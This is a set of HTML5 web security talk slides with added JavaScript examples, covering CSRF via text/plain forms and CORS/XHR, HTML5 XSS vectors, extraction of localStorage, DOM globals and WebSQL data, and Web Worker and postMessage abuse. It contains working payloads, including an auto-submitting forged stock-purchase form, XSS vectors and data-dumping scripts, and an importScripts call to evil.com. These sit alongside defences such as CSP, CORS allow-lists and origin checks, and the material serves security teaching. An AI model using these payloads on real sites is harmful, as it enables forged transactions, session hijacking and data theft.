  • 5. Modern Browser Model (layer diagram). Presentation: HTML5 + CSS, mobile, plug-ins (Silverlight, Flash), APIs (Media, Geo etc.) & Messaging. Process & Logic: JavaScript, DOM/Events, Parser/Threads. Browser Native Services: WebSQL, Cache, Storage, FileSystem. Network & Access: XHR 1 & 2, WebSocket, Plug-in Sockets. Core Policies: SOP/CORS/Content-Security sandbox.
  • 6. HTML5 Architecture & Threat Model (diagram). A single-DOM application (HTML/CSS, JavaScript, DOM/Page) runs in the browser's application sandbox under the origin policy. From there it reaches the target application over XHR and WebSockets, cross-domain applications on the Internet, native storage (Storage, WebSQL, IndexedDB, FileSystem, Cache), Messaging APIs, and Geolocation and other APIs; each of these is a trust boundary in the threat model.
  • 7. CSRF WITH HTML5
  • 8. CSRF Attack Vector (diagram). The client/victim browser logs into the application server (login success, cookie set), then visits the attacker's site, which sends back a CSRF payload. The browser issues the forged request to the application server with the live session, and the request succeeds. Successful exploitation rests on two things: SOP lets the cross-origin request be sent (it only hides the response from the attacker's page), and the browser replays the session cookie with it.
  • 9. SOP bypass and Cookie Replay – basic type. GET request vectors:
    IMG SRC    <img src="http://host/?command">
    SCRIPT SRC <script src="http://host/?command">
    IFRAME SRC <iframe src="http://host/?command">
  POST request (an HTML form named "foo" in the attacker's page, submitted automatically):
    <script type="text/javascript" language="JavaScript">
    document.foo.submit();
    </script>
  • 10. Streams – name/value pairs are gone… Modern applications post JSON, XML, JS-Script, JS-Object and JS-Array streams instead of classic name=value form pairs, so a CSRF payload has to reproduce the whole stream, not just a few fields.
  • 11. CSRF injection – splitting and forcing… A form with ENCTYPE="text/plain" lets the attacker carry an XML-RPC body in a single hidden input: the browser serialises it as name=value, so the XML prolog is split at its "=" and re-joined on the wire.
    <html>
    <body>
    <FORM NAME="buy" ENCTYPE="text/plain" action="http://trade.example.com/xmlrpc/trade.rem" METHOD="POST">
    <input type="hidden" name='<?xml version' value='"1.0"?><methodCall><methodName>stocks.buy</methodName><params><param><value><string>MSFT</string></value></param><param><value><double>26</double></value></param></params></methodCall>'>
    </FORM>
    <script>document.buy.submit();</script>
    </body>
    </html>
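The following is an added example, not part of the original slides: it reproduces, in plain JavaScript, how a browser serialises a text/plain form so that the hidden input above turns back into a complete XML-RPC body, and shows the server-side content-type check that defeats the trick. The endpoint, the field names and the "accepted" content types are constructed for the demo; the XML-RPC body is the one from the slide.

```javascript
// Added example (not from the original slides). Models the text/plain form
// encoding used by the CSRF form above and a server-side check against it.

// Per the HTML text/plain encoding algorithm, each field becomes
// "name=value" followed by CRLF, with no escaping of the payload.
function encodeTextPlain(fields) {
  return fields.map(([name, value]) => `${name}=${value}\r\n`).join('');
}

// The attacker splits the XML prolog at its first "=": the part before it is
// the input's name, the part after it is the value. The browser re-joins them
// with "=", so the server receives the original stream.
function splitAtFirstEquals(payload) {
  const idx = payload.indexOf('=');
  return [payload.slice(0, idx), payload.slice(idx + 1)];
}

// The XML-RPC body from the slide (stocks.buy MSFT 26).
const XMLRPC_BUY =
  '<?xml version="1.0"?><methodCall><methodName>stocks.buy</methodName>' +
  '<params><param><value><string>MSFT</string></value></param>' +
  '<param><value><double>26</double></value></param></params></methodCall>';

// What goes on the wire when the hidden input is submitted.
function buildCsrfBody(payload) {
  return encodeTextPlain([splitAtFirstEquals(payload)]);
}

// Server-side check a hardened XML-RPC endpoint should perform before parsing:
// insist on the content type its real clients send. A cross-origin HTML form
// can only produce text/plain, multipart/form-data or
// application/x-www-form-urlencoded, so text/xml cannot be forged by a plain
// form post (an XHR could set it, but that forces a CORS preflight).
function acceptsXmlRpcRequest(contentType, body) {
  const ct = (contentType || '').split(';')[0].trim().toLowerCase();
  if (ct !== 'text/xml' && ct !== 'application/xml') return false;
  return body.trimStart().startsWith('<?xml');
}
```

The trailing CRLF the encoding appends is harmless to an XML parser, which is why the forged body parses cleanly; the content-type check, not body parsing, is what stops it.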
  • 12. CSRF with XHR and CORS bypass (browser model diagram as on slide 5; XHR 1 & 2 and the SOP/CORS policy layer are the pieces in play).
  • 13. XHR – Level 2 powering CSRF. The HTML5 XHR object is very powerful: it allows cross-origin requests and binary upload/download. xhr.responseType can be set to "text", "arraybuffer", "document" and "blob". For posting, the data stream can be a DOMString, Document, FormData, Blob, File, ArrayBuffer etc.
  • 14. CORS & XHR – ingredients for CSRF. Before HTML5, cross-domain requests were not possible through XHR (SOP applied). HTML5 allows cross-origin calls with XHR Level 2. CORS (Cross-Origin Resource Sharing) must be followed: non-simple requests go through an OPTIONS preflight, and the server opts in by adding extra HTTP headers (Access-Control-Allow-Origin and a few others).
  • 15. CORS based HTTP Headers. Request: Origin; Access-Control-Request-Method (preflight); Access-Control-Request-Headers (preflight). Response: Access-Control-Allow-Origin; Access-Control-Allow-Credentials; Access-Control-Expose-Headers; Access-Control-Max-Age (preflight); Access-Control-Allow-Methods (preflight); Access-Control-Allow-Headers (preflight).
  • 16. XHR – Stealth POST/GET. CSRF powered by CORS and XHR gives a stealth channel and silent exploitation. One-way CSRF works with any stream, since XHR can send a raw body (XML, JSON, binary) from the browser and the request goes out even if the server never answers with CORS headers. Two-way CSRF (POST and read the response) needs the server to allow the attacker's origin. Note that Access-Control-Allow-Origin: * only permits uncredentialed reads, because browsers refuse to combine * with withCredentials; reading an authenticated response needs the attacker's origin reflected together with Access-Control-Allow-Credentials: true.
  • 17. Exploiting the use case. CORS preflight bypass: a GET/HEAD/POST whose Content-Type is text/plain, multipart/form-data or application/x-www-form-urlencoded, with no custom headers, is sent without any preflight. Forcing cookie replay with withCredentials = true. Internal network scanning and tunneling. Information harvesting (internal crawling). Stealth browser shell post-XSS (Allow-Origin: *). Business functionality abuse (upload and binary streams).
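The following is an added example, not part of the original slides: it encodes the preflight rule from slides 14 to 17 (which XHR requests the browser sends immediately, cookies attached, with no OPTIONS round trip) and contrasts a reflecting CORS policy with an allow-listed one on the server side. It simplifies CORS to method, content type and header names; the origins and the allow-list are constructed for the demo.

```javascript
// Added example (not from the original slides). Part 1: does a cross-origin XHR
// trigger a CORS preflight? Part 2: weak vs. hardened server-side CORS answer.

const SIMPLE_METHODS = new Set(['GET', 'HEAD', 'POST']);
const SIMPLE_CONTENT_TYPES = new Set([
  'application/x-www-form-urlencoded', 'multipart/form-data', 'text/plain',
]);
// Request headers the browser lets a "simple" request set (value limits omitted).
const SAFELISTED_HEADERS = new Set([
  'accept', 'accept-language', 'content-language', 'content-type',
]);

// A simple request is sent at once, cookies included, even cross-origin; CORS
// only decides whether the calling page may read the response. Anything else
// is held back until an OPTIONS preflight is approved by the server.
function needsPreflight(method, headers = {}) {
  if (!SIMPLE_METHODS.has(method.toUpperCase())) return true;
  for (const [name, value] of Object.entries(headers)) {
    const h = name.toLowerCase();
    if (!SAFELISTED_HEADERS.has(h)) return true;
    if (h === 'content-type') {
      const mime = String(value).split(';')[0].trim().toLowerCase();
      if (!SIMPLE_CONTENT_TYPES.has(mime)) return true;
    }
  }
  return false;
}

// Weak policy: reflect whatever Origin arrives and allow credentials. Any site
// can then both send and read authenticated requests (two-way CSRF).
function corsHeadersReflecting(origin) {
  return {
    'Access-Control-Allow-Origin': origin,
    'Access-Control-Allow-Credentials': 'true',
  };
}

// Hardened policy: exact-match allow-list. Unknown origins (including the
// literal "null" origin sent by sandboxed frames) get no CORS headers at all,
// so the browser withholds the response body from the calling page.
// "*" is never combined with credentials: browsers reject that combination.
function corsHeadersAllowlisted(origin, allowList) {
  if (typeof origin !== 'string' || origin === 'null') return {};
  if (!allowList.includes(origin)) return {};
  return {
    'Access-Control-Allow-Origin': origin,
    'Access-Control-Allow-Credentials': 'true',
    'Vary': 'Origin',   // keep caches from serving one origin's answer to another
  };
}
```

The first function is what a tester applies to a captured request: if it returns false and the endpoint acts on cookies alone, the endpoint is reachable by the stealth XHR on slide 20. The second pair is the server-side fix from slide 30.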
  • 18. CSRF with XHR/HTML5 (diagram, step 1). The user logs into the application server over HTTPS; the authentication server establishes the session and the browser receives the session cookie.
  • 19. CSRF with XHR/HTML5 (diagram, step 2). Normal use: JavaScript in the browser places an order through an XHR call to the JSON services over HTTP, and the application server replies with success.
  • 20. CSRF with XHR/HTML5 (diagram, step 3). The session is still live (the user has not yet logged out) when the victim visits the attacker's site, which sends the CSRF payload. The payload leverages an XHR call with a Content-Type chosen to avoid the preflight and withCredentials set to true.
  • 21. CSRF & HTML5 (demo)
  • 22. CSRF with XHR/HTML5 (diagram, step 4). The XHR initiates the HTTP buy request; the cookie is replayed and the order succeeds. Hence, without the victim's consent or notice, a stealth HTTP request is generated and silent exploitation takes place.
  • 23. CSRF & HTML5 (demo)
  • 24. CSRF with XHR/HTML5 (diagram). The application has a multi-part form business function for uploading bulk orders; the browser uploads and the server replies with success.
  • 25. CSRF/Upload – POC
  • 26. CSRF with XHR/HTML5 (diagram). The victim visits the attacker's site; its XHR initiates the HTTP multi-part upload, the cookie is replayed and the upload succeeds. Hence, without the victim's consent or notice, a stealth HTTP upload takes place and silent exploitation follows.
  • 27. CSRF/Upload (demo)
  • 28. Internal Scan – not scan but crawl as well… (diagram). The attacker's site on the Internet delivers a CSRF payload and a stealth channel to the client/victim browser, which sits on the intranet and can reach the internal web/app server, the internal HR application and the internal web mail.
  • 29. Internal Scan for CORS (demo)
  • 30. Scan and Defend. Scan and look for: Content-Type checking on the server side; the CORS policy; forms and uploads with or without tokens. Defense and countermeasures: secure libraries for streaming HTML5/Web 2.0 content; CSRF protections (anti-CSRF tokens); a stricter CORS implementation (exact-match origin allow-list, never a reflected Origin combined with credentials).
  • 31. XSS WITH HTML5
  • 32. XSS with HTML5 (tags, attributes and events) (browser model diagram as on slide 5).
  • 33. HTML5 – Tags/Attributes/Events. Tags: media (audio/video), canvas (getImageData), menu, embed, buttons/commands, form controls (keys). Attributes: form, submit, autofocus, sandbox, manifest, rel etc. Events/Objects: navigation (_self), editable content, Drag-Drop APIs, pushState (History) etc.
  • 34. XSS variants – media tags. Examples:
    <video><source onerror="javascript:alert(1)">
    <video onerror="javascript:alert(1)"><source>
  • 35. XSS variants – exploiting autofocus (the handler fires without any user interaction):
    <input autofocus onfocus=alert(1)>
    <select autofocus onfocus=alert(1)>
    <textarea autofocus onfocus=alert(1)>
    <keygen autofocus onfocus=alert(1)>
  • 36. XSS variants – form & button etc.:
    <form id="test" /><button form="test" formaction="javascript:alert(1)">test
    <form><button formaction="javascript:alert(1)">test
  Etc… and more… Nice HTML5 XSS cheat sheet: http://html5sec.org/
  • 37. Scan and Defend. Scan and look for: reflected or persistent XSS spots using HTML5 tags, attributes and event handlers. Defense and countermeasures: add the new tags, attributes and handlers to your blacklist, but do not rely on that alone; standard XSS protection by contextual output encoding remains the primary defense.
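The following is an added example, not part of the original slides: a small grep-style scanner for the HTML5 vectors from slides 34 to 36 (media onerror, autofocus/onfocus, formaction=javascript:), which is the "scan" side of this slide, next to the attribute-context output encoding that is the "defend" side. The pattern names, the sample markup and the form field are constructed for the demo; the scanner is deliberately a blacklist, so it finds what it knows and nothing more.

```javascript
// Added example (not from the original slides). Scanner for the HTML5 XSS
// vectors listed on the previous slides, plus attribute encoding as the fix.

const HTML5_XSS_PATTERNS = [
  { name: 'media-onerror',
    re: /<(video|audio|source)\b[^>]*\bonerror\s*=/i },
  { name: 'autofocus-onfocus',
    re: /<(input|select|textarea|keygen)\b[^>]*\bautofocus\b[^>]*\bonfocus\s*=/i },
  { name: 'formaction-js',
    re: /\bformaction\s*=\s*["']?\s*javascript:/i },
  { name: 'generic-handler',   // any on* attribute with a value
    re: /\bon[a-z]+\s*=/i },
];

// Returns the names of every vector found in a piece of markup (a stored
// comment, a reflected parameter rendered into a page, ...).
function scanHtml5Vectors(html) {
  return HTML5_XSS_PATTERNS.filter(p => p.re.test(html)).map(p => p.name);
}

// Output encoding for a quoted HTML attribute value. Every character that
// could close the attribute or start a new one becomes a numeric entity, so an
// injected payload stays a literal string instead of becoming markup.
function encodeForHtmlAttribute(s) {
  return String(s).replace(/[&<>"'`=\/]/g, ch => `&#${ch.charCodeAt(0)};`);
}

// Hypothetical server-side template: untrusted input lands in an attribute.
function renderNameField(untrusted) {
  return `<input type="text" name="name" value="${encodeForHtmlAttribute(untrusted)}">`;
}
```

Running the scanner over the rendered field shows the difference between the two halves of this slide: the raw payload trips the autofocus and generic-handler patterns, the encoded field trips none, because the "=" that would bind the handler is now `&#61;`.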
  • 38. CSP in Action – HTML5 defense… Content Security Policy defends the browser against post-attack scenarios (what an injected script can still do). Based on origin (SOP is the key). Provides a whitelisting mechanism for what the page may and may not load or execute. Violations can be reported back to the application (report-uri). Implemented through an extra HTTP header sent by the server to the browser; at the time of this talk the header was vendor-prefixed (X-WebKit-CSP for Safari/Chrome, X-Content-Security-Policy for Firefox), and has since been standardized as Content-Security-Policy.
  • 39. Blocking Scripts. Content-Security-Policy: script-src 'self' allows script only from the page's own origin. Under a script-src directive, inline scripts (including on* handlers and javascript: URLs) and eval-type calls are blocked by default; the keywords 'unsafe-inline' and 'unsafe-eval' re-enable them, so leave them out of the policy. With that, a post-XSS defense can be crafted: an injected inline payload does not execute.
  • 40. Controlling Browser. connect-src – controls WebSocket, XHR etc. frame-src – sources the page may embed in frames (framing of the page itself, i.e. ClickJacking, is controlled by frame-ancestors in CSP 2 or by X-Frame-Options). object-src – Flash, Silverlight etc. media-src – controls audio and video. img-src / style-src – image and style sources. default-src https: – locks all fetches to SSL only.
  • 41. Example – persistent XSS injected, but the response carries a CSP header:
    HTTP/1.1 200 OK
    Date: Wed, 12 Sep 2012 14:40:31 GMT
    Server: Microsoft-IIS/6.0
    X-Powered-By: ASP.NET
    X-WebKit-CSP: script-src 'self'
    X-AspNet-Version: 2.0.50727
    Cache-Control: private
    Content-Type: text/html; charset=utf-8
    Content-Length: 6146
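The following is an added example, not part of the original slides: a minimal evaluator for the script-src part of a CSP header, enough to show what the policy in the response above does to a stored payload (inline script blocked, remote script from another origin blocked, same-origin script allowed) and what adding 'unsafe-inline' or a scheme source changes. It handles 'self', 'none', 'unsafe-inline', '*', scheme sources and exact host sources; nonces, hashes, wildcard hosts and path matching are left out. Page and script URLs are constructed for the demo.

```javascript
// Added example (not from the original slides). Evaluates script-src the way a
// browser would for the simple source expressions used on these slides.

function parseCsp(header) {
  const policy = {};
  for (const directive of header.split(';')) {
    const tokens = directive.trim().split(/\s+/).filter(Boolean);
    if (tokens.length) policy[tokens[0].toLowerCase()] = tokens.slice(1);
  }
  return policy;
}

// Effective source list for scripts: script-src, else default-src, else no
// restriction at all (the page sent no applicable policy).
function scriptSources(policy) {
  if (policy['script-src']) return policy['script-src'];
  if (policy['default-src']) return policy['default-src'];
  return null;
}

function originOf(url) {
  const u = new URL(url);
  return `${u.protocol}//${u.host}`;
}

function sourceMatches(src, pageUrl, scriptUrl) {
  const s = src.toLowerCase();
  if (s === "'none'") return false;
  if (s === '*') return true;
  if (s === "'self'") return originOf(pageUrl) === originOf(scriptUrl);
  if (/^[a-z][a-z0-9+.-]*:$/.test(s)) return new URL(scriptUrl).protocol === s; // scheme source
  if (s.startsWith("'")) return false;          // 'unsafe-inline' etc. are not host sources
  try {                                          // host source, with or without scheme
    const host = s.includes('://') ? s : `${new URL(pageUrl).protocol}//${s}`;
    return originOf(host) === originOf(scriptUrl);
  } catch (e) {
    return false;
  }
}

// May a page at pageUrl execute an external <script src=scriptUrl>?
function allowsExternalScript(cspHeader, pageUrl, scriptUrl) {
  const sources = scriptSources(parseCsp(cspHeader));
  if (sources === null) return true;
  return sources.some(src => sourceMatches(src, pageUrl, scriptUrl));
}

// May the page run an inline <script> block, an on* handler or a javascript:
// URL? Only if the policy explicitly gives that back with 'unsafe-inline'.
function allowsInlineScript(cspHeader) {
  const sources = scriptSources(parseCsp(cspHeader));
  return sources === null ||
    sources.map(s => s.toLowerCase()).includes("'unsafe-inline'");
}
```

Feed it the header from the response above, `script-src 'self'`, and the stored payloads from slides 34 to 36 (all inline handlers) come back as blocked, while the application's own /js/app.js still loads.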
  • 42. Storage extraction with XSS (browser model diagram as on slide 5).
  • 43. Web Storage Extraction. Before HTML5 the browser had one place to store data: the cookie (limited in size and replayed on every request). HTML5 adds the Storage API (localStorage and sessionStorage), which can hold application-wide values per origin. http://www.w3.org/TR/webstorage/
  • 44. Web Storage Extraction. It is possible to steal the stored values through XSS, or through any JavaScript running in the origin. Session hijacking: if a session token lives in storage, HttpOnly is of no use, because getItem and setItem are plain JavaScript calls. XSS the box and scan through storage.
  • 45. Blind storage enumeration (iterating by index rather than with for-in, so only stored keys are listed, not the Storage object's own methods):
    if (localStorage.length) {
      console.log(localStorage.length);
      for (var n = 0; n < localStorage.length; n++) {
        var key = localStorage.key(n);
        console.log(key);
        console.log(localStorage.getItem(key));
      }
    }
  The above code extracts every storage variable.
  • 46. File System Storage. The browser exposes a sandboxed virtual file system through the FileSystem API (WebKit-only and never standardized, hence the prefix):
    window.requestFileSystem = window.requestFileSystem || window.webkitRequestFileSystem;
  It becomes a full-blown local file system for the application inside the sandbox, and it empowers the application.
  • 47. File System Storage. It provides a temporary or persistent file system:
    function init() {
      window.requestFileSystem(window.TEMPORARY, 1024*1024, function(filesystem) {
        filesys = filesystem;
      }, catcherror);
    }
  The app can have a full file system in place now.
  • 48. Sensitive information in the filesystem (demo). Assume the app creates a profile on the local file system.
  • 49. Extraction through XSS (demo). Once there is an entry point, game over: the same JavaScript can read the profile back out.
  • 50. Single DOM / One Page App – XSS. Applications run with a "rich" DOM. JavaScript sets several variables and parameters while loading: GLOBALS. They may hold sensitive information, and because they are global they remain for the life of the application, so they can be retrieved with XSS. HTTP requests and responses go through JavaScript (XHR): what about those variables?
  • 51. Blind Enumeration (dump every global string):
    for (i in window) {
      obj = window[i];
      try {
        if (typeof(obj) == "string") {
          console.log(i);
          console.log(obj.toString());
        }
      } catch (ex) {}
    }
  • 52. Global Sensitive Information Extraction from DOM. HTML5 apps run on a single DOM and keep several key global variables, objects and arrays, e.g.
    var arrayGlobals = ['my@email.com', "12141hewvsdr9321343423mjfdvint", "test.com"];
  Post-DOM-based exploitation is possible, harvesting all these values.
  • 53. Global Sensitive Information Extraction from DOM (serialise every global object and string; the null check must use a single test, since obj != null already covers undefined):
    for (i in window) {
      obj = window[i];
      if (obj != null) {
        var type = typeof(obj);
        if (type == "object" || type == "string") {
          console.log("Name:" + i);
          try {
            my = JSON.stringify(obj);
            console.log(my);
          } catch (ex) {}
        }
      }
    }
  • 54. Scan and Defend. Scan and look for: storage contents and globals. Defense and countermeasures: do not store sensitive information in localStorage or in globals; XSS protection.
  • 55. SQLi & Blind Enumeration through XSS (browser model diagram as on slide 5).
  • 56. SQL Injection. WebSQL was part of the early HTML5 work (the W3C specification was later abandoned, and it only ever shipped in WebKit/Blink browsers); it provides a SQL database to the browser itself. It allows one-time data loading and offline browsing. It causes security concerns and potential injection points, since queries are built and executed from JavaScript.
  • 57. SQL Injection. Through JavaScript one can harvest the entire local database. Example (demo).
  • 58. Blind WebSQL Enumeration:
    var dbo;
    var table;
    var usertable;
    for (i in window) {
      obj = window[i];
      try {
        if (obj.constructor.name == "Database") {
          dbo = obj;
          obj.transaction(function(tx) {
            tx.executeSql("SELECT name FROM sqlite_master WHERE type='table'", [],
              function(tx, results) {
                table = results;
                // results arrive asynchronously, so read them inside the callback
                if (table.rows.length > 1) usertable = table.rows.item(1).name;
              }, null);
          });
        }
      } catch (ex) {}
    }
  • 59. Blind WebSQL Enumeration. We run through all window objects and pick those whose constructor is "Database". We then issue a SELECT directly against the sqlite_master table. We grab the first user table, skipping the WebKit bookkeeping table at entry 0.
  • 61. Web Messaging and Worker Injection (browser model diagram as on slide 5).
  • 62. Web Messaging. HTML5 has a new inter-frame communication system called Web Messaging. With the postMessage() call a parent frame/domain can exchange messages with an iframe. The iframe can be loaded from a cross domain, which creates issues: data/information validation, and data leakage by cross-posting. worker.webkitPostMessage – faster, with transferable objects.
  • 63. Web Messaging – Scenario. If postMessage() is sent with a target origin of "*", the page can be loaded in an attacker's iframe and the messaging hijacked. Likewise, if the listener does not check event.origin against a fixed origin, the frame listens to any domain, again an issue. Incoming streams must be checked before innerHTML or eval(). An iframe or Web Worker can glue two streams together, same domain or cross domain.
  • 64. Origin check (demo).
  • 65. Web Worker – Hacks! Web Workers bring real threads to HTML pages using JavaScript, so concurrency no longer has to be faked with setTimeout(), setInterval(), XMLHttpRequest callbacks and event handlers. Totally async and well supported.
    [initialize] var worker = new Worker('task.js');
    [messaging]  worker.postMessage();
  • 66. Web Worker – Hacks! (diagram). The web page runs JavaScript against the current DOM on the browser platform; the Web Worker runs on a background thread with its own scope and objects (XHR, Location, Navigator, Regex, Array, JSON etc.), has no DOM access, and talks to the page only by messaging.
  • 67. Web Worker – Hacks! Security issues. The worker script itself must be same-origin: a cross-domain http:/https: URL, a javascript: URL or a data: URL is not allowed in new Worker(). It has some typical issues: it allows XHR, so in-domain and CORS requests are possible; it can cause DoS if an attacker gets a stream of JavaScript to run in the worker thread (no access to the parent DOM, though); message validation is needed, else DOM-based XSS in the page that consumes the messages.
  • 68. Web Worker – Hacks! Example (the page writes worker output straight into innerHTML, so any worker message that carries markup becomes DOM-based XSS):
    <html>
    <button onclick="Read()">Read Last Message</button>
    <button onclick="stop()">Stop</button>
    <output id="result"></output>
    <script>
    function Read() {
      worker.postMessage({'cmd': 'read', 'msg': 'last'});
    }
    function stop() {
      worker.postMessage({'cmd': 'stop', 'msg': 'stop it'});
      alert("Worker stopped");
    }
    var worker = new Worker('message.js');
    worker.addEventListener('message', function(e) {
      document.getElementById('result').innerHTML = e.data;
    }, false);
    </script>
    </html>
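The following is an added example, not part of the original slides: the receiving side of a postMessage / worker message written so it can be exercised outside a browser. It serves both the origin check of slides 63 and 64 and the innerHTML sink of slide 68: a listener that accepts any origin and writes the payload to innerHTML is compared with one that pins the expected origin, allow-lists the command, and writes text only. The DOM is replaced by a tiny record object; the expected origin, the message shapes and the size limit are constructed for the demo.

```javascript
// Added example (not from the original slides). Vulnerable vs. hardened
// message handler, testable without a browser.

const EXPECTED_ORIGIN = 'https://app.example';   // assumed trusted frame origin

// Stand-in for the <output> element: records what would reach the DOM and how.
function makeSink() {
  return { html: null, text: null };
}

// Vulnerable pattern (as in the worker listener above): no origin check, and the
// message lands in innerHTML, so "<img src=x onerror=...>" becomes live markup.
// In a real page this is  element.innerHTML = event.data;
function handleMessageUnsafe(sink, event) {
  sink.html = String(event.data);
  return true;
}

// Hardened pattern.
function handleMessageSafe(sink, event) {
  // 1. Pin the sender: a listener that skips this accepts any frame that can
  //    obtain a reference to the window, which is exactly the "*" scenario.
  if (event.origin !== EXPECTED_ORIGIN) return false;
  // 2. Expect structured data, never a string to eval() or inject.
  const msg = event.data;
  if (typeof msg !== 'object' || msg === null) return false;
  // 3. Allow-list the command vocabulary.
  if (msg.cmd !== 'read' && msg.cmd !== 'stop') return false;
  // 4. Bound and type-check the payload.
  if (typeof msg.text !== 'string' || msg.text.length > 256) return false;
  // 5. Write as text, so markup stays inert. In a real page this is
  //    element.textContent = msg.text;
  sink.text = msg.text;
  return true;
}
```

On the sending side the same rule applies in reverse: call `target.postMessage(data, EXPECTED_ORIGIN)` rather than `postMessage(data, '*')`, so a message meant for the trusted frame is never delivered to whatever page happens to be loaded in it.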
  • 69. Web Workers – Hacks! Possible to cause XSS: running script, passing a hidden payload. Web workers can also embed a silently running JS file that can be controlled, so they can be a tool for payload delivery and control within the browser. importScripts("http://evil.com/payload.js") – a worker can pull in a cross-domain script, since importScripts is not restricted to the worker's own origin.
  • 70. Scan and Defend. Scan and look for: JavaScript scanning of messaging and worker implementations; DOM calls; use of eval(), document.* calls etc. Defense and countermeasures: a fixed-origin check on the message event listener is a must; secure JavaScript coding.
  • 71. APIs… A few other HTML5 APIs are interesting from a security standpoint. File APIs allow local file access and can be mixed with ClickJacking and other attacks to gain client files. Drag-Drop APIs: exploiting self-XSS and a few other tricks, hijacking cookies… Lots more to explore and defend.
  • 72. Resources/References: http://www.html5rocks.com/en/ (solid stuff); https://www.owasp.org/index.php/HTML5_Security_Cheat_Sheet (OWASP cheat sheet); http://html5sec.org/ (quick cheat sheet); http://html5security.org/ (good resources); http://blog.kotowicz.net/ (interesting work).
  • 73. CONCLUSION AND QUESTIONS. http://shreeraj.blogspot.com, shreeraj@blueinfy.com, http://www.blueinfy.com